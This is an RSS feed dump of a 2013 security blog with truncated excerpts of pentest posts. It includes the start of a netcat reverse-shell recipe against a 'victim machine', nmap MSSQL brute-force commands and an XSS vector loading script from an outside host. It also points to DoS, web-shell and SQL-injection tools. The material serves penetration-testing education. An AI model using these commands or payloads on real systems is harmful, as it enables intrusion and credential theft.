tag:blogger.com,1999:blog-4148307234956956891Fri, 17 May 2013 16:45:18 +0000mobilecovert channelxordecodenewshtml5snifferingHydraWindowsAppleopenvasWebbacktrackiphoneSourceOWASPpowershellexploitationBrute ForceVulnerabilityMacvideoxssiOSmd5. sha1facebookreverse_engineeringvirtualboxjavawebdavsecurityvmwareCheat Sheetprivilege escalationWiresharkmetasploitwordlisttrojanKalifake antivirusrootkitOSXfuzzforensicsNetwork Security ToolkitAPTandroidpacket analysisdnsscanningfixevilgradeNSTBrute Force Toolvideo securitypentestGHDBrubyshellcodeobfuscation0dayMicrosoftproxyjavascriptCainpivothackingF5Information SecuritytordeobfuscatehardenWeb Application AttackencryptDefensivesecurity newsNetwork Securitypythonshellscam app.raspberry_ipWeb ApplicationhoneypotdosbypassdatabaselinuxdebugCrackbotsocial engineeringtoolbackdoorhowtosql_injectionprogrammingAbelnmapsshscapyw3aflinksysspoofhacking toolInformation LeakwirelessLFItricksniffertwitterdictionarychecklistarticleiPadpasswordipv6nsePublic about IT. security news and technical.http://r00tsec.blogspot.com/noreply@blogger.com (Sumate jitpukdebodin)Blogger970125Subscribe with My Yahoo!Subscribe with NewsGatorSubscribe with My AOLSubscribe with BloglinesSubscribe with NetvibesSubscribe with GoogleSubscribe with PageflakesSubscribe with PlusmoSubscribe with The Free DictionarySubscribe with Bitty BrowserSubscribe with Live.comSubscribe with Excite MIXSubscribe with WebwagSubscribe with Podcast ReadySubscribe with WikioSubscribe with Daily Rotationtag:blogger.com,1999:blog-4148307234956956891.post-6840083349330235593Fri, 17 May 2013 06:55:00 +00002013-05-17T13:55:15.712+07:00Information Leaktoolsecurity newshowtohacking toolInformation Securityprivilege escalationsecurityWeb Application AttackbackdoorexploitationpentestSourceprogramminghackingtrickIPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) Admin account Takeover leading to code execution Written on : 2013/05/02 Released on : 2013/05/13 Author: John JEAN (@johnjean on twitter) Affected application: Invision Power Board <= 3.4.4 Type of vulnerability: Logical Vulnerability / Bad Sanitization Required informations : Administrator's email Evaluated Risk : Critical Solution http://feedproxy.google.com/~r/r00tsecblog/~3/RAAhJSSJ7CE/ipb-invision-power-board-all-versions.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/RAAhJSSJ7CE" height="1" width="1"/>http://r00tsec.blogspot.com/2013/05/ipb-invision-power-board-all-versions.htmltag:blogger.com,1999:blog-4148307234956956891.post-888274641074903219Fri, 17 May 2013 06:47:00 +00002013-05-17T13:47:23.861+07:00toolsecurity newshacking toolInformation SecuritysecurityWeb Application AttackWebdosSourceWeb ApplicationNetwork SecurityhackingtrickHTTPFlooder is a tool that can perform stress tests, load tests, botnet simulation, DoS/DDoS tests and fuzzing for HTTP protocol.It supports the following attack types:GET FloodPOST FloodSlow Headers (Slowlories)Slow POSTHash DoSMix Flood (mixing GET/POST Flood)Range BytesHTTP Header FuzzingSlow Header FuzzingMX Flooder over Balancer Source: https://code.google.com/p/httpflooder/ If you like http://feedproxy.google.com/~r/r00tsecblog/~3/2xlBeTD7RNQ/tool-httpflooder-dosddos-http-tool.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/2xlBeTD7RNQ" height="1" width="1"/>http://r00tsec.blogspot.com/2013/05/tool-httpflooder-dosddos-http-tool.htmltag:blogger.com,1999:blog-4148307234956956891.post-5481386201353301798Fri, 17 May 2013 06:35:00 +00002013-05-17T13:35:12.246+07:00pentestlinuxhowtoopenvasInformation Securityhacking toolsecurityKalihackingfixbacktracktrickIf you want to download the fix script, please go to the Source.   1. Remove all old lib and program apt-get remove --purge greenbone-security-assistant libopenvas6 openvas-administrator openvas-manager openvas-cli openvas-scanner   2. Create folder for download the new package mkdir openvasfix   3. Go into new folder and download necessary package cd openvasfix wget http://repo.kali.org/kali/http://feedproxy.google.com/~r/r00tsecblog/~3/PxZOaY9MvQA/howto-fix-openvas-on-kalibacktrack-6.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/PxZOaY9MvQA" height="1" width="1"/>http://r00tsec.blogspot.com/2013/05/howto-fix-openvas-on-kalibacktrack-6.htmltag:blogger.com,1999:blog-4148307234956956891.post-2487045540079774398Sat, 11 May 2013 17:14:00 +00002013-05-12T00:14:48.432+07:00pentestlinuxexploitationhowtoInformation Securityhacking toolsecurityarticleshellNetwork SecurityhackingtrickIf you want the explain of this howto, please go to the Source. In the Hacker machine, Create netcat server - nc -nvlp 443 In the victim machine - mknod /tmp/backpipe p  made a named pipe (also called a FIFO) called backpipe using the mknod command. The mknod command lets me create things in the file system, and here I'm creating something called "backpipe" that is of type "p", which is a http://feedproxy.google.com/~r/r00tsecblog/~3/r8343bzG3pY/howto-netcat-without-eexecute-command.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/r8343bzG3pY" height="1" width="1"/>http://r00tsec.blogspot.com/2013/05/howto-netcat-without-eexecute-command.htmltag:blogger.com,1999:blog-4148307234956956891.post-8697359933581487008Thu, 09 May 2013 07:33:00 +00002013-05-09T14:33:34.852+07:00Information Leaktoolsecurity newspasswordhacking toolInformation SecuritysecuritybacktrackexploitationpentestSourceNetwork SecurityhackingtrickA regular-expression based python MITM DNS server with correct DNS request passthrough and "Not Found" responses. USAGE: ./fakedns.py [config file] The dns.conf should be set the following way: [python regular expression] [answer] The DNS server will take care of the rest, just have a valid regex in the first part. This server handles only A record requests. If there's enough interest, http://feedproxy.google.com/~r/r00tsecblog/~3/OP9gxNc6QU4/tools-fakedns-with-python.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/OP9gxNc6QU4" height="1" width="1"/>http://r00tsec.blogspot.com/2013/05/tools-fakedns-with-python.htmltag:blogger.com,1999:blog-4148307234956956891.post-5136486741167589966Thu, 09 May 2013 04:57:00 +00002013-05-09T11:57:29.957+07:00forensicsInformation LeakpentestSourcehowtoInformation Securityvmwarevirtualboxsecurityfixbacktracktrick Sometimes you have to clone hdd and add both of hdd into the same Virtual Machine of VirtualBox but the Virtualbox will not allow you and it will say "The hard disk is already exist in the media registry because the UUID is the same" So we can resolve this problem with changing UUID of hdd VBoxManage internalcommands sethduuid <pathofHDD> If you like my blog, Please Donate Me Or Click The http://feedproxy.google.com/~r/r00tsecblog/~3/-Of7Zp3D8Sg/howto-change-uuid-of-virtualbox.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/-Of7Zp3D8Sg" height="1" width="1"/>http://r00tsec.blogspot.com/2013/05/howto-change-uuid-of-virtualbox.htmltag:blogger.com,1999:blog-4148307234956956891.post-935115115476837180Fri, 03 May 2013 05:05:00 +00002013-05-03T12:05:21.368+07:00pentestSourcehowtoInformation SecuritysecuritymetasploithackingbacktracktrickWhen you delete the file it will take the file to Trash and you can permanently remove file with 1. cd /root/.local/share/Trash/files 2. rm your-shit-file  If you like my blog, Please Donate Me Or Click The Banner For Support Me. One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00 http://feedproxy.google.com/~r/r00tsecblog/~3/grB_UWI5kdw/howto-purge-file-in-kali-backtrack-6.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/grB_UWI5kdw" height="1" width="1"/>http://r00tsec.blogspot.com/2013/05/howto-purge-file-in-kali-backtrack-6.htmltag:blogger.com,1999:blog-4148307234956956891.post-3857752564905003640Thu, 02 May 2013 09:35:00 +00002013-05-02T16:35:13.577+07:00DefensiveInformation Leaktoolsecurity newspentesthowtoInformation Securityhacking toolsecurityarticleNetwork SecurityhackingTcpLogView is a simple utility that monitors the opened TCP connections on your system, and adds a new log line every time that a TCP connection is opened or closed. For every log line, the following information is displayed: Even Time, Event Type (Open, Close, Listen), Local Address, Remote Address, Remote Host Name, Local Port, Remote Port, Process ID, Process Name, and the country http://feedproxy.google.com/~r/r00tsecblog/~3/t2OW99xtThA/tools-tcplogview-another-tcp-connection.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/t2OW99xtThA" height="1" width="1"/>http://r00tsec.blogspot.com/2013/05/tools-tcplogview-another-tcp-connection.htmltag:blogger.com,1999:blog-4148307234956956891.post-5620499398357947066Tue, 30 Apr 2013 07:44:00 +00002013-04-30T14:44:15.385+07:00Brute Force ToolBrute ForcepentestpasswordInformation SecuritybotAppleNetwork SecuritydatabaseandroidHydraBrute Force Login To MSSQL nmap -p1433 --script ms-sql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt target_ip Try With Empty Password  nmap -p1433 --script ms-sql-empty-password target_ip     If you like my blog, Please Donate Me Or Click The Banner For Support Me. One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00 http://feedproxy.google.com/~r/r00tsecblog/~3/T88TbZLUJ1Y/howto-brute-force-mssql-with-nmap.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/T88TbZLUJ1Y" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/howto-brute-force-mssql-with-nmap.htmltag:blogger.com,1999:blog-4148307234956956891.post-1042045931449491052Mon, 29 Apr 2013 15:16:00 +00002013-04-29T23:02:55.246+07:00toolpentestlinuxSourcehowtoInformation Securityhacking toolsecurityhackingbacktracktrickraspberry_ip1. Use Disk Utility to format SD Card to FAT32(exFAT) 2. Find what is your SD Card partition, Go to Apple icon in the top left corner -> About This Mac -> More Info... -> System Report -> Card Reader -> Find BSD parameter , you will know what is diskn -> n is disk number that we use in next step 3. List all of mounting disk df -h  4. In terminal, unmount  the partition  sudo diskutil unmout http://feedproxy.google.com/~r/r00tsecblog/~3/Vkn1UjXWrw4/howto-installing-kali-in-raspberry-pi.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/Vkn1UjXWrw4" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/howto-installing-kali-in-raspberry-pi.htmltag:blogger.com,1999:blog-4148307234956956891.post-7386429276178487905Wed, 24 Apr 2013 05:12:00 +00002013-04-24T12:12:32.784+07:00Information Leaktoolsecurity newshowtohacking toolInformation SecuritysecurityshellcodeMicrosoftshellbackdoorpentesthackingtrickIf you can exploit a flaw to upload files to an executable directory in an IIS environment, there are plenty of web shells around (some of which may be trojaned but that’s another issue) to give you an interactive command prompt via your browser. If the application makes use of a MS-SQL database, the same flaw can be used to upload Sophie, a “web SQL shell”, giving you access to the databasehttp://feedproxy.google.com/~r/r00tsecblog/~3/fEM97JQGqRs/sophie-web-sql-shell-iis-shell.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/fEM97JQGqRs" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/sophie-web-sql-shell-iis-shell.htmltag:blogger.com,1999:blog-4148307234956956891.post-4154180674482446109Sat, 20 Apr 2013 14:00:00 +00002013-04-20T21:00:48.465+07:00javascripttoolscapyhowtohacking toolInformation Securityprivilege escalationsecuritymetasploitWeb Application AttackbackdoorexploitationpentestSourcepythonNetwork SecurityhackingtrickPHP/ASP/JSP Backdoors/Other, "DoS Scripts" Scanning scripts Bots that are found spreading via Web App Vulns And "eratta" - random nasty things we find in our webroots. There will also be a folder named "honey" that will contain stuff found in my day to day searching of honeynet logs and google searching for broken stuff that was "interesting". Warning: Files on this project MAY be (are http://feedproxy.google.com/~r/r00tsecblog/~3/xR-viPo-Ou8/collection-of-web-application-backdoors.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/xR-viPo-Ou8" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/collection-of-web-application-backdoors.htmltag:blogger.com,1999:blog-4148307234956956891.post-5178590183928690927Fri, 19 Apr 2013 03:17:00 +00002013-04-19T10:17:56.254+07:00DefensivelinuxInformation Securityarticlefixbacktracktrick Open a Terminal Window (Ctl+Alt+T) Run this command -> sed -i 's/geteuid/getppid/g' /opt/google/chrome/chrome Launch Google Chrome  Source: http://www.sw-at.com/blog/2012/12/13/fixed-google-chrome-can-not-be-run-as-root-ubuntu/ If you like my blog, Please Donate Me Or Click The Banner For Support Me. One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00 http://feedproxy.google.com/~r/r00tsecblog/~3/Mzev9V-SJ1w/howto-fix-google-chrome-can-not-be-run.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/Mzev9V-SJ1w" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/howto-fix-google-chrome-can-not-be-run.htmltag:blogger.com,1999:blog-4148307234956956891.post-8288915104387064473Thu, 18 Apr 2013 04:02:00 +00002013-04-18T14:13:27.088+07:00DefensivepentestlinuxhowtoNetwork Security ToolkitInformation Securitysecurityipv6articletrick1. Install IPv6 DHCP Server - apt-get install wide-dhcpv6-server  2. While you're installing wide-dhcpv6-server, choose interface that you want to use IPv6. 3. Copy Configuration from /usr/share/doc/wide-dhcpv6-server/examples/dhcp6s.conf.sample to /etc/wide-dhcpv6/dhcp6s.conf - cp  /usr/share/doc/wide-dhcpv6-server/examples/dhcp6s.conf.sample /etc/wide-dhcpv6/dhcp6s.conf 4. Change the http://feedproxy.google.com/~r/r00tsecblog/~3/IFYBjHSSezE/howto-setup-ipv6-network-with-ubuntu.htmlnoreply@blogger.com (Sumate jitpukdebodin)1<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/IFYBjHSSezE" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/howto-setup-ipv6-network-with-ubuntu.htmltag:blogger.com,1999:blog-4148307234956956891.post-7011055870646579268Tue, 16 Apr 2013 14:31:00 +00002013-04-16T21:31:23.302+07:00toolbypasssecurity newshowtohacking toolInformation SecuritysecuritypentestSourceobfuscationNetwork SecurityhackingtrickTopera is a brand new TCP port scanner under IPv6, with the particularity that these scans are not detected by Snort.   Source: https://code.google.com/p/topera/ If you like my blog, Please Donate Me Or Click The Banner For Support Me. One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00 http://feedproxy.google.com/~r/r00tsecblog/~3/xHacza4C7Eo/topera-ipv6-port-scanner.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/xHacza4C7Eo" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/topera-ipv6-port-scanner.htmltag:blogger.com,1999:blog-4148307234956956891.post-8039283568391443264Sun, 14 Apr 2013 13:08:00 +00002013-04-14T20:08:16.351+07:00WebInformation Leaktoolsecurity newspentestInformation Securityhacking toolsecurityWeb ApplicationhackingtrickThis site, www.exploitsearch.net, is an attempt at cross referencing/correlating exploits and vulnerability data from various sources and making the resulting database available to everyone. Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source databases/websites and parses the contained data. Once the data is collected and parsed,http://feedproxy.google.com/~r/r00tsecblog/~3/LpAOB_5koD8/exploitsearchnet-exploit-search-engine.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/LpAOB_5koD8" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/exploitsearchnet-exploit-search-engine.htmltag:blogger.com,1999:blog-4148307234956956891.post-906170105084202561Tue, 09 Apr 2013 08:48:00 +00002013-04-09T15:48:15.553+07:00WebDefensiveInformation Leaksql_injectionexploitationhowtoInformation SecuritysecurityarticleWeb Application Attackhackingtrick The class of vulnerabilities known as SQL injection continues to present an extremely high risk in the current network threat landscape. In 2011, SQL injection was ranked first on the MITRE Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Software Errors list. Exploitation of these vulnerabilities has been implicated in many re cent high - profile intrusions.   Source: http://http://feedproxy.google.com/~r/r00tsecblog/~3/C768FXN2zRU/practical-identification-of-sql.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/C768FXN2zRU" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/practical-identification-of-sql.htmltag:blogger.com,1999:blog-4148307234956956891.post-984568336549494722Tue, 09 Apr 2013 08:44:00 +00002013-04-09T15:44:37.370+07:00toolsecurity newsnewshowtoInformation SecurityarticleCheat SheetsecuritymetasploitexploitationprogramminghackingtrickReview it :) Source: http://www.cheatography.com/huntereight/cheat-sheets/metasploit-4-5-0-dev-15713/pdf/  If you like my blog, Please Donate Me Or Click The Banner For Support Me. One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00 http://feedproxy.google.com/~r/r00tsecblog/~3/iNHTVsdh7iE/metasploit-450-dev-cheat-sheet-by.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/iNHTVsdh7iE" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/metasploit-450-dev-cheat-sheet-by.htmltag:blogger.com,1999:blog-4148307234956956891.post-5813371040994920582Tue, 02 Apr 2013 01:39:00 +00002013-04-02T08:39:44.927+07:00Information Leaksecurity newshowtohacking toolInformation SecurityarticlesecurityWeb Application Attackexploitationsql_injectionWeb ApplicationhackingtrickIn the page "http://'.$host.$path.'index.php/ajax/api/reputation/vote" of vBulletin has vulnerability in nodeid parameter and it use POST Method". So if you want the Script and more detail, please visit the Source. Source: http://ha.cker.ir/2013/04/vbulletin-5-sql-injection/  If you like my blog, Please Donate Me Or Click The Banner For Support Me. One Dollar $1.00 Two Dollar $2.00 http://feedproxy.google.com/~r/r00tsecblog/~3/wwGT6A37UP0/vbulletin-5-sql-injection.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/wwGT6A37UP0" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/vbulletin-5-sql-injection.htmltag:blogger.com,1999:blog-4148307234956956891.post-1849865490099805063Tue, 02 Apr 2013 01:35:00 +00002013-04-02T08:35:33.849+07:00WebDefensivepentestnewshowtohtml5Information SecurityprogrammingsecurityWeb ApplicationThis is the the list of character that you can use in HTML5, please visit the Source. Source:  http://dev.w3.org/html5/html-author/charref If you like my blog, Please Donate Me Or Click The Banner For Support Me. One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00 http://feedproxy.google.com/~r/r00tsecblog/~3/diCsvOq_pUc/html5-character-entitiy-reference-chart.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/diCsvOq_pUc" height="1" width="1"/>http://r00tsec.blogspot.com/2013/04/html5-character-entitiy-reference-chart.htmltag:blogger.com,1999:blog-4148307234956956891.post-1150097225627561469Thu, 28 Mar 2013 04:18:00 +00002013-03-28T11:18:23.593+07:00toolpentestexploitationhowtoInformation Securityhacking toolsecuritypacket analysisNetwork SecurityhackingtrickWindows 7 and newer systems called Netsh trace. This allows you to do full system event tracing as well as packet captures without installing any additional software on the target system.   netsh trace start capture=yes maxSize=10MB tracefile=c:\capture.etl Source: http://obscuresecurity.blogspot.com/2013/03/capturing-bad-packets-with-netsh.html If you like my blog, Please Donate Me Or http://feedproxy.google.com/~r/r00tsecblog/~3/G7PZEk1G9aQ/howto-use-netsh-to-capture-traffic.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/G7PZEk1G9aQ" height="1" width="1"/>http://r00tsec.blogspot.com/2013/03/howto-use-netsh-to-capture-traffic.htmltag:blogger.com,1999:blog-4148307234956956891.post-580320398861642614Tue, 26 Mar 2013 07:45:00 +00002013-03-26T14:45:09.715+07:00Defensivetoolsecurity newshowtohacking toolInformation SecuritysecuritybacktrackfixpentestSourcehackingKali 1. Install Required Applicationecho cups enabled >> /usr/sbin/update-rc.d echo vmware-tools enabled >> /usr/sbin/update-rc.d apt-get install gcc make linux-headers-$(uname -r) ln -s /usr/src/linux-headers-$(uname -r)/include/generated/uapi/linux/version.h /usr/src/linux-headers-$(uname -r)/include/linux/ 2. Mount the Vmware tools ISO by clicking “Install VMware Tools” from the appropriate http://feedproxy.google.com/~r/r00tsecblog/~3/rZL2U5I3VAM/installing-vmware-tools-in-kali.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/rZL2U5I3VAM" height="1" width="1"/>http://r00tsec.blogspot.com/2013/03/installing-vmware-tools-in-kali.htmltag:blogger.com,1999:blog-4148307234956956891.post-6372857566093317695Sat, 16 Mar 2013 00:46:00 +00002013-03-16T07:46:15.556+07:00Information Leaktoolbypassxsshacking toolInformation SecuritysecurityWeb Application AttackWebexploitationpentestSourceobfuscationWeb ApplicationhackingtrickIf you want to see all in the list, please go to the Source. A very short cross browser header injection Exploit Name: A very short cross browser header injection Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws' Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website'shttp://feedproxy.google.com/~r/r00tsecblog/~3/Fh6SpaTnoSA/howto-xss-cheat-sheet.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/Fh6SpaTnoSA" height="1" width="1"/>http://r00tsec.blogspot.com/2013/03/howto-xss-cheat-sheet.htmltag:blogger.com,1999:blog-4148307234956956891.post-516215346377778959Sat, 16 Mar 2013 00:40:00 +00002013-03-16T07:40:14.194+07:00Brute Force Toolmd5. sha1Brute ForcepentestpasswordexploitationInformation Securityhacking toolhackingCrackL517 contains hundreds of options for generating a large, personalized, and/or generic wordlist. With L517, you can generate phone numbers, dates, or every possible password with only a few clicks of the keyboard; all the while, filtering unwanted passwords.   Source: https://code.google.com/p/l517/ If you like my blog, Please Donate Me Or Click The Banner For Support Me. One Dollar http://feedproxy.google.com/~r/r00tsecblog/~3/A9JURkpXgJg/tools-generate-wordlist-on-windows.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/A9JURkpXgJg" height="1" width="1"/>http://r00tsec.blogspot.com/2013/03/tools-generate-wordlist-on-windows.htmltag:blogger.com,1999:blog-4148307234956956891.post-8985697814142640598Sat, 16 Mar 2013 00:38:00 +00002013-03-16T07:38:39.084+07:00toolsecurity newshowtohacking toolInformation SecuritysecuritybacktrackexploitationlinuxpentestSourcehackingKalitrickraspberry_ip1. Just Plug your USB Wi-Fi adapter into the PI. 2. At the command prompt type “ifconfig” and check to see if your Wi-Fi adapter is listed. It should show up as wlan0. If you don’t see it, type “ifconfig wlan0 up“. Then run “ifconfig” again and it should show up: 3. Next let’s see what networks our wireless card can see. Type, “iwlist wlan0 scanning“: 4. Now let’s run some of the basic http://feedproxy.google.com/~r/r00tsecblog/~3/pcrAiA26bxE/howto-wireless-penetration-testing-with.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/pcrAiA26bxE" height="1" width="1"/>http://r00tsec.blogspot.com/2013/03/howto-wireless-penetration-testing-with.html